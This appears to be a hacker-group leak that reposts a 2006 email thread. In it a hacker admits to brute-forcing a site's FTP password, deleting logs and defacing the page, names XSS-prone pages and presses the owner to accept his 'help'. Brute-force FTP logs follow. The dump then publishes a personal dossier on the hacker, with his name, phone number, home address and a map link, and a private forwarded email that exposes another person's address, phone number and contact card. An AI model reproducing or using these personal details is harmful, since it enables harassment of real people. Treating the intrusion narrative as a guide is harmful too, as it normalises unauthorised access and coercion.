> > > > > >
> > > > > > Please explain what you can do to secure the site. Are you
> > > > > > helping as a hobby or as a job? Let's say if we are not looking in
hiring,
> > > > > > are you going to continue hacking us?
> > > > > >
> > > > > > Andrew
> > > > > >
> > > > > > On 8/10/06, Charade <charade000@gmail.com > wrote:
> > > > > > >
> > > > > > > Dear Tillie,
> > > > > > >
> > > > > > > First of all i would like to make it clear that i never gained
> > > > > > > root to the server, nor had 300 attempts to penetrate your email
system, I
> > > > > > > gained access through your FTP port which was vulnerable to Brutus
because
> > > > > > > of the weak password. And as for the search, Im not impressed, you
have me
> > > > > > > on your myspace and could have *easily* got the information from
there, and
> > > > > > > i could do the same.
> > > > > > >
> > > > > > >
> > > > > > > I'd also like to inform you that when i did have root( in
> > > > > > > the FTP that is), I had the oppurtunity to cause catastrophic damage,
I
> > > > > > > could have easily accessed the bank accounts of your members, and
yours as
> > > > > > > well, You should be thanking me that my ethics were against this, and
in
> > > > > > > replacement the only damage i did was deleting the logs, and replacing
the
> > > > > > > index.html
> > > > > > >
> > > > > > > I wont pursue damage to hack your site, so you can be rest
> > > > > > > assured on this. But, i am offering my services to assist you in
securing
> > > > > > > your website, because I can at the moment deface it again, through
many
> > > > > > > other ways including an SQL Injection.
> > > > > > >
> > > > > > > in Conclusion, show me the logs , or any kind of proof that
> > > > > > > indicate i hacked your server. I am offering my allegiance to HELPING
you.
> > > > > > >
> > > > > > > Dont refuse.
> > > > > > >
> > > > > >
> > > > > >
> > > > >
> > > >
> > >
> >
>
------=_Part_41690_10171641.1156130150838
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
I sent it to you already, did u get it?<br><br>
<div><span class="gmail_quote">On 8/20/06, <b class="gmail_sendername">Charade</b>
<<a href="mailto:charade000@gmail.com">charade000@gmail.com</a>> wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0px 0px 0px 0.8ex;
BORDER-LEFT: #ccc 1px solid">
<div>Yes, id still like to see the log. Hopefully your not going through too much
trouble acquiring it.</div>
<div><span class="e" id="q_10d2ce6a889cf59d_1"><br><br>
<div><span class="gmail_quote">On 8/20/06, <b class="gmail_sendername">JA
Synergy</b> <<a onclick="return top.js.OpenExtLink(window,event,this)"
href="mailto:jasynergy@gmail.com" target="_blank"> jasynergy@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0pt 0pt 0pt 0.8ex;
BORDER-LEFT: rgb(204,204,204) 1px solid">
<div>
<div>Hello Saeed,</div>
<div> </div>
<div>Just writing to let you know that I am waiting for my admin the send me the
log. Do you still want it?</div>
<div> </div>
<div>Regards,</div></div>
<div><span>
<div> </div>
<div>Andrew<br><br> </div>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">Charade</b>
<<a onclick="return top.js.OpenExtLink(window,event,this)"
href="mailto:charade000@gmail.com" target="_blank">charade000@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0px 0px 0px 0.8ex;
BORDER-LEFT: rgb(204,204,204) 1px solid">
<div>Thanks, appreciate it.</div>
<div><span><br>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">JA
Synergy</b> <<a onclick="return top.js.OpenExtLink(window,event,this)"
href="mailto:jasynergy@gmail.com" target="_blank">jasynergy@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0pt 0pt 0pt 0.8ex;
BORDER-LEFT: rgb(204,204,204) 1px solid">
<div>
<div>Thanks for your help. I will try to fix the problems that you suggest. I
will contact my server admin for the log.<br><br> </div></div>
<div><span>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">Charade</b>
<<a onclick="return top.js.OpenExtLink(window,event,this)"
href="mailto:charade000@gmail.com" target="_blank">charade000@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0px 0px 0px 0.8ex;
BORDER-LEFT: rgb(204,204,204) 1px solid">
<div> Of course I wouldnt do it as a job, im doing this out of kindess to
help you. Im a hacker not a criminal. I don't have time to sit here and do
Penetration tests on your server, but i will point out certain things.
<br><br> But, if you needed someone to hire to administrate your servers, or a
"consultant" to spend his day running tests im more than happy, and you
know where to find me.<br><br>First of all, you have tons of directories vulnerable
to cross site scripting
<br>especially in the display_map.php<br> and demo/sendurl.php<br><br>-clean up
the coding on the /admin.php<br><b>Fatal error</b>: Call to undefined function:
gettext() in <b>/home/jaenergy/public_html/admin.php</b> on line
<b>26<br>Thats</b>:<b> how i was able to find out your user name was
jaenergy.<br><br>And if i spent more time im sure i can find more..<br><br>Just
curious though because i thought the admin of the website was a girl<br>
<a onclick="return top.js.OpenExtLink(window,event,this)"
href="http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=
86281236"
target="_blank">http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&
;friendid=86281236
</a><br>is saying that is her website. <br>And that she coded it herself, which is a
lie because i noticed it used pagekits.<br><span style="FONT-WEIGHT: bold"><br>And
btw, can you send me the proof that show me i wa sin the server
<br>Just curious.<br></span><span style="FONT-WEIGHT: bold"></span><br></b></div>
<div><span><br><br>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">JA
Synergy</b> <<a onclick="return top.js.OpenExtLink(window,event,this)"
href="mailto:jasynergy@gmail.com" target="_blank">jasynergy@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0pt 0pt 0pt 0.8ex;
BORDER-LEFT: rgb(204,204,204) 1px solid">
<div>
<div>Hello Saeed,</div>
<div> </div>
<div>Please explain what you can do to secure the site. Are you helping as a
hobby or as a job? Let's say if we are not looking in hiring, are you going to
continue hacking us? <br> </div>
<div>Andrew</div></div>
<div><span>
<div> </div>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">Charade</b>
<<a onclick="return top.js.OpenExtLink(window,event,this)"
href="mailto:charade000@gmail.com" target="_blank">charade000@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0px 0px 0px 0.8ex;
BORDER-LEFT: rgb(204,204,204) 1px solid">
<div>Dear Tillie,<br><br>First of all i would like to make it clear that i never
gained root to the server, nor had 300 attempts to penetrate your email system, I
gained access through your FTP port which was vulnerable to Brutus because of the
weak password. And as for the search, Im not impressed, you have me on your myspace
and could have *easily* got the information from there, and i could do the same.
<br> <br><br> I'd also like to inform you that when i did have
root( in the FTP that is), I had the oppurtunity to cause catastrophic damage, I
could have easily accessed the bank accounts of your members, and yours as well, You
should be thanking me that my ethics were against this, and in replacement the only
damage i did was deleting the logs, and replacing the
index.html<br><br> I wont pursue damage to hack your site, so you can be rest
assured on this. But, i am offering my services to assist you in securing your
website, because I can at the moment deface it again, through many other ways
including an SQL Injection.
<br><br> in Conclusion, show me the logs , or any kind of proof that indicate i
hacked your server. I am offering my allegiance to HELPING you.<br><br>Dont refuse.
</div></blockquote></div><br></span></div></blockquote></div>
<br></span></div></blockquote></div><br></span></div></blockquote></div><br></span><
/div></blockquote></div><br></span></div></blockquote></div><br></span></div></block
quote></div><br>
------=_Part_41690_10171641.1156130150838--
X-Gmail-Received: 4c0c1d29ecf28ed3aabc749261a72ef96a2b83c0
Received: by 10.70.63.4 with HTTP; Mon, 21 Aug 2006 08:17:23 -0700 (PDT)
Message-ID: <42cb2150608210817y667277f1ma9d30904b8b5ac8f@mail.gmail.com>
Date: Mon, 21 Aug 2006 08:17:23 -0700
From: Charade <charade000@gmail.com>
To: "JA Synergy" <jasynergy@gmail.com>
Subject: Re: Reply to cease and descist
In-Reply-To: <9efd8e010608202015w23c2fac5q8aa972ab3445b1f6@mail.gmail.com>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_Part_43329_30480888.1156173443704"
References: <42cb2150608100754r5a510412q247e3a7883ac4c6@mail.gmail.com>
<9efd8e010608100910v3cc997c3s80323ffbd9dd02c9@mail.gmail.com>
<42cb2150608101117s200efb08p90299900fa1c8af8@mail.gmail.com>
<9efd8e010608101402q1209b1dcqd6853ace2a7a61cd@mail.gmail.com>
<42cb2150608101424k718fa5e6q7b5b45cbd104c891@mail.gmail.com>
<9efd8e010608200657m3e79f2g5524b2c75cd314d6@mail.gmail.com>
<42cb2150608201145g2b62ae1ex6facd9900ef9c6da@mail.gmail.com>
<9efd8e010608202015w23c2fac5q8aa972ab3445b1f6@mail.gmail.com>
Delivered-To: charade000@gmail.com
------=_Part_43329_30480888.1156173443704
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Yea, thanks
On 8/20/06, JA Synergy <jasynergy@gmail.com> wrote:
>
> I sent it to you already, did u get it?
>
>
> On 8/20/06, Charade <charade000@gmail.com> wrote:
> >
> > Yes, id still like to see the log. Hopefully your not going through too
> > much trouble acquiring it.
> >
> >
> > On 8/20/06, JA Synergy < jasynergy@gmail.com > wrote:
> > >
> > > Hello Saeed,
> > >
> > > Just writing to let you know that I am waiting for my admin the send
> > > me the log. Do you still want it?
> > >
> > > Regards,
> > >
> > > Andrew
> > >
> > >
> > > On 8/10/06, Charade <charade000@gmail.com > wrote:
> > > >
> > > > Thanks, appreciate it.
> > > >
> > > > On 8/10/06, JA Synergy <jasynergy@gmail.com > wrote:
> > > > >
> > > > > Thanks for your help. I will try to fix the problems that you
> > > > > suggest. I will contact my server admin for the log.
> > > > >
> > > > >
> > > > > On 8/10/06, Charade <charade000@gmail.com > wrote:
> > > > > >
> > > > > > Of course I wouldnt do it as a job, im doing this out of
> > > > > > kindess to help you. Im a hacker not a criminal. I don't have time to
sit
> > > > > > here and do Penetration tests on your server, but i will point out
certain
> > > > > > things.
> > > > > >
> > > > > > But, if you needed someone to hire to administrate your
> > > > > > servers, or a "consultant" to spend his day running tests im more than
> > > > > > happy, and you know where to find me.
> > > > > >
> > > > > > First of all, you have tons of directories vulnerable to cross
> > > > > > site scripting
> > > > > > especially in the display_map.php
> > > > > > and demo/sendurl.php
> > > > > >
> > > > > > -clean up the coding on the /admin.php
> > > > > > *Fatal error*: Call to undefined function: gettext() in *
> > > > > > /home/jaenergy/public_html/admin.php* on line *26
> > > > > > Thats*:* how i was able to find out your user name was jaenergy.
> > > > > >
> > > > > > And if i spent more time im sure i can find more..
> > > > > >
> > > > > > Just curious though because i thought the admin of the website
> > > > > > was a girl
> > > > > >
http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=86281236
> > > > > >
> > > > > > is saying that is her website.
> > > > > > And that she coded it herself, which is a lie because i noticed
> > > > > > it used pagekits.
> > > > > >
> > > > > > And btw, can you send me the proof that show me i wa sin the
> > > > > > server
> > > > > > Just curious.
> > > > > >
> > > > > > *
> > > > > >
> > > > > >
> > > > > > On 8/10/06, JA Synergy <jasynergy@gmail.com > wrote:
> > > > > > >
> > > > > > > Hello Saeed,
> > > > > > >
> > > > > > > Please explain what you can do to secure the site. Are you
> > > > > > > helping as a hobby or as a job? Let's say if we are not looking in
hiring,
> > > > > > > are you going to continue hacking us?
> > > > > > >
> > > > > > > Andrew
> > > > > > >
> > > > > > > On 8/10/06, Charade <charade000@gmail.com > wrote:
> > > > > > > >
> > > > > > > > Dear Tillie,
> > > > > > > >
> > > > > > > > First of all i would like to make it clear that i never
> > > > > > > > gained root to the server, nor had 300 attempts to penetrate your
email
> > > > > > > > system, I gained access through your FTP port which was vulnerable
to Brutus
> > > > > > > > because of the weak password. And as for the search, Im not
impressed, you
> > > > > > > > have me on your myspace and could have *easily* got the information
from
> > > > > > > > there, and i could do the same.
> > > > > > > >
> > > > > > > >
> > > > > > > > I'd also like to inform you that when i did have root( in
> > > > > > > > the FTP that is), I had the oppurtunity to cause catastrophic
damage, I
> > > > > > > > could have easily accessed the bank accounts of your members, and
yours as
> > > > > > > > well, You should be thanking me that my ethics were against this,
and in
> > > > > > > > replacement the only damage i did was deleting the logs, and
replacing the
> > > > > > > > index.html
> > > > > > > >
> > > > > > > > I wont pursue damage to hack your site, so you can be rest
> > > > > > > > assured on this. But, i am offering my services to assist you in
securing
> > > > > > > > your website, because I can at the moment deface it again, through
many
> > > > > > > > other ways including an SQL Injection.
> > > > > > > >
> > > > > > > > in Conclusion, show me the logs , or any kind of proof that
> > > > > > > > indicate i hacked your server. I am offering my allegiance to
HELPING you.
> > > > > > > >
> > > > > > > > Dont refuse.
> > > > > > > >
> > > > > > >
> > > > > > >
> > > > > >
> > > > >
> > > >
> > >
> >
>
------=_Part_43329_30480888.1156173443704
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Yea, thanks<br><br><div><span class="gmail_quote">On 8/20/06, <b
class="gmail_sendername">JA Synergy</b> <<a
href="mailto:jasynergy@gmail.com">jasynergy@gmail.com</a>>
wrote:</span><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204,
204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
<div>I sent it to you already, did u get it?</div><div><span class="e"
id="q_10d2eba1a24fb8f0_1"><br><br>
<div><span class="gmail_quote">On 8/20/06, <b class="gmail_sendername">Charade</b>
<<a href="mailto:charade000@gmail.com" target="_blank" onclick="return
top.js.OpenExtLink(window,event,this)">charade000@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204);
margin: 0px 0px 0px 0.8ex; padding-left: 1ex;">
<div>Yes, id still like to see the log. Hopefully your not going through too much
trouble acquiring it.</div>
<div><span><br><br>
<div><span class="gmail_quote">On 8/20/06, <b class="gmail_sendername">JA
Synergy</b> <<a href="mailto:jasynergy@gmail.com" target="_blank" onclick="return
top.js.OpenExtLink(window,event,this)"> jasynergy@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204);
margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
<div>
<div>Hello Saeed,</div>
<div> </div>
<div>Just writing to let you know that I am waiting for my admin the send me the
log. Do you still want it?</div>
<div> </div>
<div>Regards,</div></div>
<div><span>
<div> </div>
<div>Andrew<br><br> </div>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">Charade</b>
<<a href="mailto:charade000@gmail.com" target="_blank" onclick="return
top.js.OpenExtLink(window,event,this)">charade000@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204);
margin: 0px 0px 0px 0.8ex; padding-left: 1ex;">
<div>Thanks, appreciate it.</div>
<div><span><br>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">JA
Synergy</b> <<a href="mailto:jasynergy@gmail.com" target="_blank" onclick="return
top.js.OpenExtLink(window,event,this)">jasynergy@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204);
margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
<div>
<div>Thanks for your help. I will try to fix the problems that you suggest. I
will contact my server admin for the log.<br><br> </div></div>
<div><span>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">Charade</b>
<<a href="mailto:charade000@gmail.com" target="_blank" onclick="return
top.js.OpenExtLink(window,event,this)">charade000@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204);
margin: 0px 0px 0px 0.8ex; padding-left: 1ex;">
<div> Of course I wouldnt do it as a job, im doing this out of kindess to
help you. Im a hacker not a criminal. I don't have time to sit here and do
Penetration tests on your server, but i will point out certain things.
<br><br> But, if you needed someone to hire to administrate your servers, or a
"consultant" to spend his day running tests im more than happy, and you
know where to find me.<br><br>First of all, you have tons of directories vulnerable
to cross site scripting
<br>especially in the display_map.php<br> and demo/sendurl.php<br><br>-clean up
the coding on the /admin.php<br><b>Fatal error</b>: Call to undefined function:
gettext() in <b>/home/jaenergy/public_html/admin.php</b> on line
<b>26<br>Thats</b>:<b> how i was able to find out your user name was
jaenergy.<br><br>And if i spent more time im sure i can find more..<br><br>Just
curious though because i thought the admin of the website was a girl<br>
<a
href="http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=
86281236" target="_blank" onclick="return
top.js.OpenExtLink(window,event,this)">http://profile.myspace.com/index.cfm?fuseacti
on=user.viewprofile&friendid=86281236
</a><br>is saying that is her website. <br>And that she coded it herself, which is a
lie because i noticed it used pagekits.<br><span style="font-weight: bold;"><br>And
btw, can you send me the proof that show me i wa sin the server
<br>Just curious.<br></span><span style="font-weight: bold;"></span><br></b></div>
<div><span><br><br>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">JA
Synergy</b> <<a href="mailto:jasynergy@gmail.com" target="_blank" onclick="return
top.js.OpenExtLink(window,event,this)">jasynergy@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204);
margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
<div>
<div>Hello Saeed,</div>
<div> </div>
<div>Please explain what you can do to secure the site. Are you helping as a
hobby or as a job? Let's say if we are not looking in hiring, are you going to
continue hacking us? <br> </div>
<div>Andrew</div></div>
<div><span>
<div> </div>
<div><span class="gmail_quote">On 8/10/06, <b class="gmail_sendername">Charade</b>
<<a href="mailto:charade000@gmail.com" target="_blank" onclick="return
top.js.OpenExtLink(window,event,this)">charade000@gmail.com</a>
> wrote:</span>
<blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204);
margin: 0px 0px 0px 0.8ex; padding-left: 1ex;">
<div>Dear Tillie,<br><br>First of all i would like to make it clear that i never
gained root to the server, nor had 300 attempts to penetrate your email system, I
gained access through your FTP port which was vulnerable to Brutus because of the
weak password. And as for the search, Im not impressed, you have me on your myspace
and could have *easily* got the information from there, and i could do the same.
<br> <br><br> I'd also like to inform you that when i did have
root( in the FTP that is), I had the oppurtunity to cause catastrophic damage, I
could have easily accessed the bank accounts of your members, and yours as well, You
should be thanking me that my ethics were against this, and in replacement the only
damage i did was deleting the logs, and replacing the
index.html<br><br> I wont pursue damage to hack your site, so you can be rest
assured on this. But, i am offering my services to assist you in securing your
website, because I can at the moment deface it again, through many other ways
including an SQL Injection.
<br><br> in Conclusion, show me the logs , or any kind of proof that indicate i
hacked your server. I am offering my allegiance to HELPING you.<br><br>Dont refuse.
</div></blockquote></div><br></span></div></blockquote></div>
<br></span></div></blockquote></div><br></span></div></blockquote></div><br></span><
/div></blockquote></div><br></span></div></blockquote></div><br></span></div></block
quote></div><br>
</span></div></blockquote></div><br>
------=_Part_43329_30480888.1156173443704--
[penguin]$ cat bruteforce-ftp-logs.txt
Aug 8 15:20:49 alpha proftpd[3922]: alpha.alphared.com (75.22.72.48[75.22.72.48]) -
USER admin: no such user found from 75.22.72.48 [75.22.72.48] to 64.72.127.199:21
Aug 8 15:21:15 alpha proftpd[4028]: alpha.alphared.com (75.22.72.48[75.22.72.48]) -
USER anonymous: no such user found from 75.22.72.48 [75.22.72.48] to
64.72.127.199:21
Aug 8 18:00:42 alpha proftpd[08067]: alpha.alphared.com (75.22.72.48[75.22.72.48])
- USER admin: no such user found from 75.22.72.48 [75.22.72.48] to 64.72.127.199:21
Aug 8 18:00:42 alpha proftpd[08062]: alpha.alphared.com (75.22.72.48[75.22.72.48])
- USER admin: no such user found from 75.22.72.48 [75.22.72.48] to 64.72.127.199:21
Aug 8 18:00:42 alpha proftpd[08064]: alpha.alphared.com (75.22.72.48[75.22.72.48])
- USER admin: no such user found from 75.22.72.48 [75.22.72.48] to 64.72.127.199:21
Aug 8 18:00:42 alpha proftpd[08063]: alpha.alphared.com (75.22.72.48[75.22.72.48])
- USER admin: no such user found from 75.22.72.48 [75.22.72.48] to 64.72.127.199:21
Aug 8 18:00:42 alpha proftpd[08068]: alpha.alphared.com (75.22.72.48[75.22.72.48])
- USER admin: no such user found from 75.22.72.48 [75.22.72.48] to 64.72.127.199:21
(.....)
Aug 8 19:53:59 alpha proftpd[14208]: alpha.alphared.com (75.22.72.48[75.22.72.48])
- USER jaenergy: Login successful.
Aug 8 20:12:23 alpha proftpd[14171]: alpha.alphared.com (75.22.72.48[75.22.72.48])
- USER jaenergy: Login successful.
Wow, thats pretty leet, bruteforcing FTP logins.
Since those admins seemed to do some digging on Phate, we decided to show them
how to gather personal info about someone via the web:
[penguin]$ cat personal.txt
Name: Said Azizian
Phone number: 1-(951)-817-9345
Address: 2981 Veranda Lane, Corona California, 92882
School's website: www.cnusd.k12.va.us
Map of area around house:
http://www.google.com/maps?f=q&hl=en&q=2981+Veranda+Lane+92882&ie=UTF8&ll=33.848058,
-117.592705&spn=0.001742,0.005407&t=k&om=1
There's also this gem that was stumbled across. Apperantly, Christopher
O'Shields (aka psychomarine) wants to hold a confrenece, and is thinking of
having Kevin Mitnick as a guest speaker:
[penguin]$ cat mitnick.txt
X-Gmail-Received: 2ddcd30f76051b612c0ef61ea98b03fa0de3121a
Delivered-To: charade000@gmail.com
Received: by 10.70.63.4 with SMTP id l4cs308477wxa;
Wed, 23 Aug 2006 09:25:37 -0700 (PDT)
Received: by 10.65.75.19 with SMTP id c19mr660492qbl;
Wed, 23 Aug 2006 09:25:35 -0700 (PDT)
Received: by 10.65.123.16 with HTTP; Wed, 23 Aug 2006 09:25:35 -0700 (PDT)
Message-ID: <a20b9f470608230925k4c5b6ea6ud77c430562abb1b6@mail.gmail.com>
Date: Wed, 23 Aug 2006 12:25:35 -0400
From: psychomarine <psychomarine@gmail.com>
To: charade000@gmail.com
Subject: Fwd: Mitnick inquiry from yesterday
In-Reply-To: <26467889.254701156336835284.JavaMail.servlet@perfora>
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_Part_71926_18041514.1156350335275"
References: <26467889.254701156336835284.JavaMail.servlet@perfora>
------=_Part_71926_18041514.1156350335275
Content-Type: multipart/alternative;
boundary="----=_Part_71927_25886265.1156350335275"
------=_Part_71927_25886265.1156350335275
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
here read this whole email.
---------- Forwarded message ----------
From: mitnick@newleafproductions.com <mitnick@newleafproductions.com>
Date: Aug 23, 2006 8:40 AM
Subject: Mitnick inquiry from yesterday
To: psychomarine@gmail.com
Hi Christopher:
Thank you for writing yesterday to see if Mr. Mitnick is available for your
upcoming event in Orlando, FL.
I'd be happy to discuss this possibility with the speaker; I just need a few
more pieces of information to ensure I understand the scope of this possible
appearance.
Once I have your response to these questions, I'll talk to Kevin about it
and get right back to you. In the interim, I've included Mr. Mitnick's
pricing, below.
Many thanks,
Amy Gray
Questions:
What type of gathering do you plan to hold? Live? Virtual? Both?
Would the speaker you are asking about be a keynote speaker? Panelist?
Other? Please be as specific as you can about the possible role(s) for the
speaker, on-site at the event.
How many people are you hoping to attract to your event?
Do you have a preferred date/timeframe for your event? A target month? A
specific date? All dates open at this point?
===================
Fees for engagements booked within the US/Canada:
Kevin Mitnick
60 minute presentation followed by 15 minutes of open Q&A: $18,500 USD plus
business class travel and expenses
If you would consider a different format (ie: no prep required of the
speaker-- for instance, 60 minute panel participation or 60 minute interview
with a moderator format), then the pricing would go down to: $16,000 USD
plus T&E as described above.
The fee for a videoconference (presentation or panel session) are the same
as quoted above, but hosts would save significantly on travel expenses --
expenses would likely only be the cost of connectivity/phone line and local
travel to/from the satellite uplink/studio, if needed.
All fees quoted in this email are net to the speaker and are paid directly
to Mitnick Security Consulting. 50% is due at the time of agreement signing
via wire transfer--once that payment is rec'd, New Leaf sends an official
confirmation via email and promotion of the speaker's involvement can
commence. The balance is due, plus an estimated advance for out of pocket
travel, 30 days before the Speaker departs for the event.
--
Topics:
Mr. Mitnick has four excellent presentations to choose from, including his
signature presentation: The Art of Deception. Full descriptions are
available for each presentation topic at
www.NewLeafProductions.com/mitnick.html
>
>-----Original Message-----
>From: MSC Web Contact Form [mailto:webcontact@mitsec.com]
>Sent: Tuesday, August 22, 2006 8:40 PM
>Subject: Mitnick Security - Web Contact Form Submission
>
>A new contact submission has been submitted.
>
>Name: Christopher O'Shields
>Company: Enigma Group
>Address 1: 603 caborca ct
>Address 2:
>City: ocoee
>State: FL
>Zip: 34761
>Country: US
>
>Phone: 4076412530
>Fax:
>Email: psychomarine@gmail.com
>
>Notes:
>Simple really, I own a website dedicated to training people in Web
Security.
>Weve been open for about 3 years now and were having a conference, in
>orlando florida this year. We would like to inquire on what it would take
>to have you as a speaker on social engineering. Thank You.
>
>Expressed Interests:
>Add to Mailing List
>Speaker Inquiry
--
Amy Gray
Speaker's Agent for Kevin Mitnick and Steve Wozniak
New Leaf Productions LLC
Box 51586
Boston, MA 02205
Phone: 617-916-9570 (NEW, as of June 2nd, 2006)
Fax: 617-507-5847
Email: Amy@NewLeafProductions.com
------=_Part_71927_25886265.1156350335275
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
here read this whole email. <br><br>---------- Forwarded message ----------<br><span
class="gmail_quote">From: <b class="gmail_sendername"><a
href="mailto:mitnick@newleafproductions.com">mitnick@newleafproductions.com</a></b>
<<a
href="mailto:mitnick@newleafproductions.com">mitnick@newleafproductions.com</a>><
br>Date: Aug 23, 2006 8:40 AM<br>Subject: Mitnick inquiry from yesterday<br>To: <a
href="mailto:psychomarine@gmail.com">psychomarine@gmail.com
</a><br><br></span>Hi Christopher:<br><br>Thank you for writing yesterday to see if
Mr. Mitnick is available for your upcoming event in Orlando, FL.<br><br>I'd
be happy to discuss this possibility with the speaker; I just need a
few more pieces of information to ensure I understand the scope of this
possible appearance.<br><br>Once I have your response to these
questions, I'll talk to Kevin about it and get right back to you. In
the interim, I've included Mr. Mitnick's pricing, below.<br><br>Many thanks,<br>Amy
Gray<br><br>Questions:<br>What type of gathering do you plan to hold? Live? Virtual?
Both?<br><br>Would
the speaker you are asking about be a keynote speaker? Panelist? Other?
Please be as specific as you can about the possible role(s) for the
speaker, on-site at the event.<br><br>How many people are you hoping to attract to
your event?<br><br>Do
you have a preferred date/timeframe for your event? A
target month? A specific date? All dates open at this
point?<br><br>===================<br><br>Fees for engagements booked within the
US/Canada:<br>Kevin Mitnick<br>60 minute presentation followed by 15 minutes of open
Q&A: $18,500 USD plus business class travel and expenses
<br><br>If
you would consider a different format (ie: no prep required of the
speaker-- for instance, 60 minute panel participation or 60 minute
interview with a moderator format), then the pricing would go down to:
$16,000 USD plus T&E as described above.<br><br>The fee for a
videoconference (presentation or panel session) are the same as quoted
above, but hosts would save significantly on travel expenses --
expenses would likely only be the cost of connectivity/phone line and
local travel to/from the satellite uplink/studio, if needed.<br><br>All
fees quoted in this email are net to the speaker and are paid directly
to Mitnick Security Consulting. 50% is due at the time of agreement
signing via wire transfer--once that payment is rec'd, New Leaf sends
an official confirmation via email and promotion of the speaker's
involvement can commence. The balance is due, plus an estimated advance
for out of pocket travel, 30 days before the Speaker departs for the
event.<br><br>--<br>Topics:<br>Mr. Mitnick has four excellent
presentations to choose from, including his signature presentation: The
Art of Deception. Full descriptions are available for each presentation
topic at <a
href="http://www.NewLeafProductions.com/mitnick.html">www.NewLeafProductions.com/mit
nick.html</a><br><br><br>><br>>-----Original Message-----<br>>From: MSC Web
Contact Form [mailto:<a href="mailto:webcontact@mitsec.com">
webcontact@mitsec.com</a>]<br>>Sent: Tuesday, August 22, 2006 8:40
PM<br>>Subject: Mitnick Security - Web Contact Form Submission<br>><br>>A
new contact submission has been submitted.<br>><br>>Name:
Christopher O'Shields
<br>>Company: Enigma Group<br>>Address 1: 603 caborca ct<br>>Address
2:<br>>City: ocoee<br>>State: FL<br>>Zip: 34761<br>>Country:
US<br>><br>>Phone: 4076412530<br>>Fax:<br>>Email: <a
href="mailto:psychomarine@gmail.com">
psychomarine@gmail.com</a><br>><br>>Notes:<br>>Simple really, I own a
website dedicated to training people in Web Security.<br>>Weve been open for
about 3 years now and were having a conference, in<br>>orlando florida this
year. We would like to inquire on what it would take
<br>>to have you as a speaker on social engineering. Thank
You.<br>><br>>Expressed Interests:<br>>Add to Mailing List<br>>Speaker
Inquiry<br><br><br><br>--<br>Amy Gray<br>Speaker's Agent for Kevin Mitnick and Steve
Wozniak
<br>New Leaf Productions LLC<br>Box 51586<br>Boston, MA 02205<br>Phone: 617-916-9570
(NEW, as of June 2nd, 2006)<br>Fax: 617-507-5847<br>Email: <a
href="mailto:Amy@NewLeafProductions.com">Amy@NewLeafProductions.com</a><br>
<br>
------=_Part_71927_25886265.1156350335275--
------=_Part_71926_18041514.1156350335275
Content-Type: text/x-vcard; name=Contact-1156304399.vcf;
charset=ANSI_X3.4-1968
Content-Transfer-Encoding: base64
X-Attachment-Id: 0.1
Content-Disposition: attachment; filename="Contact-1156304399.vcf"
QkVHSU46dkNhcmQKVkVSU0lPTjozLjAKTjpPJ1NoaWVsZHM7Q2hyaXN0b3BoZXIgOzs7CkZOOkNo
cmlzdG9waGVyICBPJ1NoaWVsZHMKT1JHOkVuaWdtYSBHcm91cApBRFI7Ojs7NjAzIGNhYm9yY2Eg
Y3QKO29jb2VlO0ZMOzM0NzYxO1VTOwpURUw7VFlQRT1WT0lDRSxNU0c6NDA3NjQxMjUzMApURUw7
VFlQRT1GQVg6CkVNQUlMO1RZUEU9SU5URVJORVQsUFJFRjpwc3ljaG9tYXJpbmVAZ21haWwuY29t
Ck5PVEU7RU5DT0RJTkc9UVVPVEVELVBSSU5UQUJMRTpTaW1wbGUgcmVhbGx5LCBJIG93biBhIHdl
